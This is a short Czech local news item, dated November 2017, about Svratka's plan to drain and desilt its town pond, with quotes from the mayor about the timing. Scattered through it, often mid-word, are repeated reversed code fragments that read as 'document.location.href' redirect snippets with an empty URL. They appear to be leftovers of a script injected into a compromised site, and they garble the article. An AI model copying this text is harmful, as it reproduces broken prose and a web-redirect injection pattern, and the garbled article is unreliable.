Rainbow page separator

Ve Svratce plánují odbahnění rybníka, příští rok ho vypustí

Pondělí, 6. listopadu 2017

Svratka / Odbahnit plánuje svratecká radnice tamní rybník Svratka. V le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce již došlo na pořízení projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové dokumentace včetně zpracování a podání žádosti o dotaci na tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to investiční akci.
„Výběrové řízení na dodavatele stavby proběhne v roce příštím. Realizace, respektive vlastní odbahnění, kterému bude předcházet vypuštění rybníka a také his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toricky třetí výlov plánovaný na lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topad příštího roku, se uskuteční přibližně na jaře roku 2019,“ informoval svratecký starosta František Mládek.
Vodní nádrž pod svrateckým koupalištěm byla na řece Svratce přitékající od Herálce a po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom pokračující ke Křižánkám vybudována v letech 1973 až 1983.